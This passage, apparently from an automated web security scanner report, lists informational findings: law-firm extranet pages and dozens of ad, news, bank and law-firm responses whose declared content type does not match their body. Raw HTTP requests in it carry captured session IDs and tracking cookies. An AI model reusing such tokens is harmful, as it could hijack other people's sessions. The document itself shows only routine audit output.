Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.milbank.com/en/Attorneys/s-u/SearchResults.htm?Search=alphabetical&Char=X
Cookie: ASP.NET_SessionId=2l3npqztwgswxyek3nbgdm45

Response

HTTP/1.1 200 OK
Content-Length: 817
Content-Type: text/html
Content-Location: http://www.milbank.com/clientweb/index.htm
Last-Modified: Wed, 23 Dec 2009 17:06:32 GMT
Accept-Ranges: bytes
ETag: "70eb8246f283ca1:23a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:30:17 GMT

<html>

<head>
<title>Milbank Extranet</title>
</head>

<frameset framespacing="0" border="false" frameborder="0" rows="45,*,15">
<frame name="Index_Top" scrolling="no" target="contents" src=
...[SNIP]...

27.38. http://www.milbank.com/clientweb/MTHM_main_bot.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.milbank.com
Path:	/clientweb/MTHM_main_bot.html

Request

GET /clientweb/MTHM_main_bot.html HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.milbank.com/clientweb/
Cookie: ASP.NET_SessionId=2l3npqztwgswxyek3nbgdm45

Response

HTTP/1.1 200 OK
Content-Length: 374
Content-Type: text/html
Last-Modified: Wed, 07 Nov 2007 20:16:45 GMT
Accept-Ranges: bytes
ETag: "734f261e7b21c81:23a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:30:18 GMT

<html>

<head>
<title>Milbank, Tweed, Hadley & McCloy LLP</title>
<base target="contents">
</head>

<body bgcolor="#FF9000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<
...[SNIP]...

27.39. http://www.milbank.com/clientweb/MTHM_main_top.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.milbank.com
Path:	/clientweb/MTHM_main_top.html

Request

GET /clientweb/MTHM_main_top.html HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.milbank.com/clientweb/
Cookie: ASP.NET_SessionId=2l3npqztwgswxyek3nbgdm45

Response

HTTP/1.1 200 OK
Content-Length: 1415
Content-Type: text/html
Last-Modified: Wed, 23 Dec 2009 17:06:32 GMT
Accept-Ranges: bytes
ETag: "11898046f283ca1:23a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:30:21 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<base target="Main_Page">
<style type="text/css">
A:Link {color:#ffffff;
...[SNIP]...

27.40. http://www.moritthock.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moritthock.com
Path:	/index.php

Request

GET /index.php?css={stylesheet=global/nav HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/
Cookie: exp_last_visit=989860893; exp_last_activity=1305220893; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Content-Length: 11
Content-Type: text/html

Invalid URI

27.41. http://www.nytimes.com/adx/bin/adx_remote.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nytimes.com
Path:	/adx/bin/adx_remote.html

Request

Response

27.42. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.usaa.com
Path:	/inet/imco_mutualfund/ImMutualFunds

Request

Response

28. Content type incorrectly stated previous next
There are 59 instances of this issue:

http://207.56.166.97/favicon.ico
http://207.56.166.97/javascript/c_smartmenus.js
http://ads1.revenue.net/j
http://amch.questionmarket.com/adscgen/sta.php
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cdn.gotraffic.net/v/20110510_141513/images/exclusive_bar_bg_12x20.png
http://cdn.gotraffic.net/v/20110510_141513/images/icons/chevrons.gif
http://cdn.taboolasyndication.com/libtrc/bloomberg/rbox.en.4-6-15-45512.json
http://cgiwsc.enhancedsitebuilder.com/extras/res/js/date.js
http://content.dl-rms.com/rms/3882/nodetag.js
http://dealbook.nytimes.com/favicon.ico
http://dealbook.nytimes.com/proxy/
http://dealbook.nytimes.com/svc/community/V2/requestHandler
http://dealbook.nytimes.com/svc/timespeople/bell.html
http://j.maxmind.com/app/geoip.js
http://kona40.kontera.com/KonaGet.js
http://labs.csscorp.com/site/favicon.ico
http://markets.on.nytimes.com/research/modules/dealbook_2010/dealbook.asp
http://pillsburylaw.app4.hubspot.com/salog.js.aspx
http://rapidssl-aia.geotrust.com/rapidssl.crt
https://services.sungarddx.com/admin/GetExternMedia.aspx
https://services.sungarddx.com/common/js/AdminFunctions.asp
http://topics.nytimes.com/adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00
http://topics.nytimes.com/adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc
http://topics.nytimes.com/svc/timespeople/bell.html
http://translate.googleapis.com/translate_a/t
http://trc.taboolasyndication.com/bloomberg/trc/2/json
http://wd.sharethis.com/api/getCount2.php
http://webezines.kwithost.com/sx25Feed.php
http://wolfgreenfield.com/favicon.ico
https://ww3.janus.com/advisor/images/st_facebook_footer.gif
https://ww3.janus.com/advisor/images/st_facebook_header.gif
https://ww3.janus.com/advisor/images/st_twitter_footer.gif
https://ww3.janus.com/advisor/images/st_twitter_header.gif
http://www.beneschlaw.com/files/ImageControl/be5e9886-616f-4c6d-972a-05c597caa379/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/go%20green%20(2).gif
http://www.butlerrubin.com/web/br.nsf/br_logo.jpg
http://www.butlerrubin.com/web/br.nsf/tableback.jpg
http://www.conferenceservers.com/browser/proxy.asp
http://www.digiware.net/templates/home/favicon.ico
http://www.digiware.net/templates/intena1/favicon.ico
http://www.dmoc.com/favicon.ico
http://www.elawmarketing.com/favicon.ico
http://www.facebook.com/extern/login_status.php
http://www.foxbusiness.com/authentication/logout/submit
http://www.foxbusiness.com/static/all/generated/js/fb2-breaking-news.js
http://www.foxbusiness.com/static/all/img/global/logo-disqus-1.gif
http://www.google.com/search
http://www.hbsr.com/favicon.ico
http://www.korteco.com/sites/all/themes/korteco/favicon.ico
http://www.mimecast.com/Global/HeaderTitleVideos/Images/SecurityV4.png
http://www.moritthock.com/index.php
http://www.nytimes.com/adx/bin/adx_remote.html
http://www.privateequityinfo.com/favicon.ico
http://www.privateequityinfo.com/grfx/grfx2009/topmenu/shadow.jpg
http://www.tuckerellis.com/tucker-favicon.ico
https://www.usaa.com/favicon.ico
https://www.wellsfargo.com/img/theprivatebank/apa.jpg
http://www.wolfgreenfield.com/favicon.ico
http://www.wolfgreenfield.com/javascript/c_smartmenus.js

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

28.1. http://207.56.166.97/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://207.56.166.97
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: 207.56.166.97
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:41:45 GMT
Server: Apache/2.0.64 (Red Hat)
Last-Modified: Tue, 29 Jul 2008 19:11:49 GMT
ETag: "1e8c7bb-e36-696a0740"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain

..............h...&... ..............(....... ...........@.............................i._=......~c>.....;........yV.....I/....u.......................r.......s.Z7...].....A&........................
...[SNIP]...

28.2. http://207.56.166.97/javascript/c_smartmenus.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://207.56.166.97
Path:	/javascript/c_smartmenus.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /javascript/c_smartmenus.js HTTP/1.1
Host: 207.56.166.97
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:53 GMT
Server: Apache/2.0.64 (Red Hat)
Last-Modified: Tue, 29 Jul 2008 19:11:31 GMT
ETag: "1e985d8-45d5-68575ec0"
Accept-Ranges: bytes
Content-Length: 17877
Connection: close
Content-Type: application/x-javascript

/*
========================================
SmartMenus v6.0.2 Script Core
Commercial License No.: UN-LICENSED
========================================
Please note: THIS IS NOT FREE SOFTWARE.
Licen
...[SNIP]...

28.3. http://ads1.revenue.net/j previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads1.revenue.net
Path:	/j

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

28.4. http://amch.questionmarket.com/adscgen/sta.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://amch.questionmarket.com
Path:	/adscgen/sta.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/sta.php?survey_num=909615&site=312253240&code=214693346 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:49 GMT
Server: Apache/2.2.14 (Ubuntu)
DL_S: a202
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 168

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d909615/2/200214693346/decide.php?ord="+Math.floor((new Date()).getTime()/1000);

}
})();

28.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

28.6. http://cdn.gotraffic.net/v/20110510_141513/images/exclusive_bar_bg_12x20.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.gotraffic.net
Path:	/v/20110510_141513/images/exclusive_bar_bg_12x20.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /v/20110510_141513/images/exclusive_bar_bg_12x20.png HTTP/1.1
Host: cdn.gotraffic.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Expires: Wed, 09 May 2012 21:04:49 GMT
Cache-Control: public,max-age=31536000
Content-Type: image/png
Last-Modified: Tue, 15 Mar 2011 16:13:41 GMT
Content-Length: 69
ETag: "45-4d7f9035"
Accept-Ranges: bytes
Date: Thu, 12 May 2011 11:37:29 GMT
Connection: close

GIF89a.........Z.`.!.......,............. ....|NV3m.[G|5.8.......P..;

28.7. http://cdn.gotraffic.net/v/20110510_141513/images/icons/chevrons.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.gotraffic.net
Path:	/v/20110510_141513/images/icons/chevrons.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /v/20110510_141513/images/icons/chevrons.gif HTTP/1.1
Host: cdn.gotraffic.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Expires: Wed, 09 May 2012 21:08:24 GMT
Cache-Control: public,max-age=31536000
Content-Type: image/gif
Last-Modified: Tue, 12 Apr 2011 16:36:19 GMT
Content-Length: 116
ETag: "74-4da47f83"
Accept-Ranges: bytes
Date: Thu, 12 May 2011 11:37:29 GMT
Connection: close

.PNG
.
...IHDR.............r`l.... PLTE...........l ....tRNS.....A....IDAT..c..`..`h..BR..Y..-....+......IEND.B`.

28.8. http://cdn.taboolasyndication.com/libtrc/bloomberg/rbox.en.4-6-15-45512.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.taboolasyndication.com
Path:	/libtrc/bloomberg/rbox.en.4-6-15-45512.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

Response

28.9. http://cgiwsc.enhancedsitebuilder.com/extras/res/js/date.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cgiwsc.enhancedsitebuilder.com
Path:	/extras/res/js/date.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /extras/res/js/date.js?cc=0.5174236237071455 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:52 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Last-Modified: Thu, 01 Oct 2009 09:44:32 GMT
ETag: "d0945-56d5-7e928000"
Accept-Ranges: bytes
Content-Length: 22229
P3P: CP="NOI COR CURa INT"
Content-Type: application/javascript

/*
   I18N:check:1
*/
/**
* iso format: YYYY-MM-DD HH:MM:SS[..II:NN]
*/
function utcIsoToDate(utcIso,honorTimezone) {
   var year    = utcIso.substring(0, 4);
   var month    = utcIso.substring(5, 7);
   var da
...[SNIP]...

28.10. http://content.dl-rms.com/rms/3882/nodetag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://content.dl-rms.com
Path:	/rms/3882/nodetag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /rms/3882/nodetag.js HTTP/1.1
Host: content.dl-rms.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-AdvancedExtranetServer
Last-Modified: Thu, 08 Feb 2007 21:38:58 GMT
ETag: "c0169ff2-6f-dee18080"
Accept-Ranges: bytes
Content-Length: 111
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:15:55 GMT
Connection: close

if(Math.random()<1) document.write('<scr'+'ipt src="http://content.dl-rms.com/dt/s/3882/s.js"></scr'+'ipt>');

28.11. http://dealbook.nytimes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://dealbook.nytimes.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198204263:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.2.10.1305198192; _chartbeat2=gi367p67ehp7835r

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:12 GMT
Server: Apache
Last-Modified: Wed, 11 May 2011 17:05:31 GMT
ETag: "100a53-37e-4a303147fecc0"
Accept-Ranges: bytes
ntCoent-Length: 894
Cneonction: close
Content-Type: text/plain; charset=UTF-8
Cache-Control: private
Content-Length: 894

..............h.......(....... ......................................................................................................................................................................
...[SNIP]...

28.12. http://dealbook.nytimes.com/proxy/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://dealbook.nytimes.com
Path:	/proxy/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /proxy/?type=twitter&widget_id=4&sidebar_id=sidebar-2&widget_name=nyt-twitter HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:04:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 34170

NYTD.TwitterReader.callback([{"text":"Raj lawyer: \"We'll see you in the Second Circuit.\" We'll hear lots more about the wiretap application there.","created_at":"Wed May 11 19:54:03 +0000 2011","sou
...[SNIP]...

28.13. http://dealbook.nytimes.com/svc/community/V2/requestHandler previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://dealbook.nytimes.com
Path:	/svc/community/V2/requestHandler

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain JSON.

Request

POST /svc/community/V2/requestHandler HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
Origin: http://dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1
Content-Length: 1507

requestData=%7B%22userContentSummary%22%3A%7B%22request%22%3A%7B%22requestType%22%3A%22UserContentSummary%22%2C%22status%22%3A%22was-approved%22%2C%22url%22%3A%22http%3A%2F%2Fdealbook.nytimes.com%2F20
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Thu, 12 May 2011 11:03:48 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Expires: Sat, 01 Jan 2000 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:03:48 GMT
Cache-Control: no-cache
Pragma: no-cache
Cteonnt-Length: 1689
Content-Length: 1689

{"userContentSummary":{"request":{"requestType":"UserContentSummary","status":"was-approved","url":"http:\/\/dealbook.nytimes.com\/2011\/05\/09\/private-equity-has-a-horse-in-this-race\/"},"respons
...[SNIP]...

28.14. http://dealbook.nytimes.com/svc/timespeople/bell.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://dealbook.nytimes.com
Path:	/svc/timespeople/bell.html

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

28.15. http://j.maxmind.com/app/geoip.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://j.maxmind.com
Path:	/app/geoip.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /app/geoip.js HTTP/1.1
Host: j.maxmind.com
Proxy-Connection: keep-alive
Referer: http://livetechtv.com/survey/c/indexns.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:09 GMT
Expires: Thu, 12 May 2011 12:32:09 GMT
Cache-Control: private
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 504
